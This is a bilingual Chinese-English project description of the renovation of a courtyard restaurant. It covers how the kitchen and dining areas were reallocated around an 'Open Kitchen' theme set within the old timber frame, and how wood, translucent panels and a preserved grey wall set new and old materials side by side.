在这个四合院餐厅的改造项目中,设计最大的挑战是如何分配厨房和就餐区的使用面积,同时还需要充分了解厨房专业的工作流程和模式,提出最合理的功能布置。因此在设计开始之前,先进行了长时间的调查研究,包括了空间的氛围,客人的心情,菜品的排布,甚至是某一道菜的具体做法。这个过程很有趣,确保到最终设计时,已经非常了解一个很本质的问题:是什么组成一间餐厅。餐厅以‘开放厨房’为主题,在木结构老房梁和立柱围合着的封闭空间里,嵌入现代厨房。建筑师还制定了节制和精巧的设计策略,用适当的通透感,舒缓原本压抑和闭塞的空间氛围。

自然的木材与半透明的阳光板材料、均质化的灯光,都赋予了老建筑以全新的活力。建筑师还特意保留了一面原本就存在的灰墙,轻盈的家具、新旧材质的对比,都让空间本身即呈现出新与旧,传统与现代的对话。而人作为空间氛围的媒介,则游走于新旧建筑的对话之中。

The most challenging part in the renovation of this courtyard restaurant is to redefine the area of the kitchen and dining area while to propose the most reasonable program after comprehensively understanding the workflow of the kitchen.Before design, we spent a long time to research the atmosphere of the space, the mood of the customers, the arrangement of dishes, and even the way of cooking a particular dish. It was an interesting experience for us because the very fundamental question was quite well understood by the end of the design: what makes a restaurant.Themed on the idea of Open Kitchen, the restaurant that was enclosed with wood beams and columns has been imbedded with a modern kitchen. The architect also custom made moderate and exquisite design strategy, releasing the depressing space by adding a proper sense of transparency.

Natural wood, semi-transparent PC panels and homogenized lights brought new energies into the old building. The contrast between the light furniture and an existing wall that was deliberately kept by the architect, between the old and the new materials has created dialogues between modern and tradition.And people, who act as the medium of spatial atmosphere, are constantly walking through the interaction between the old and new structures.
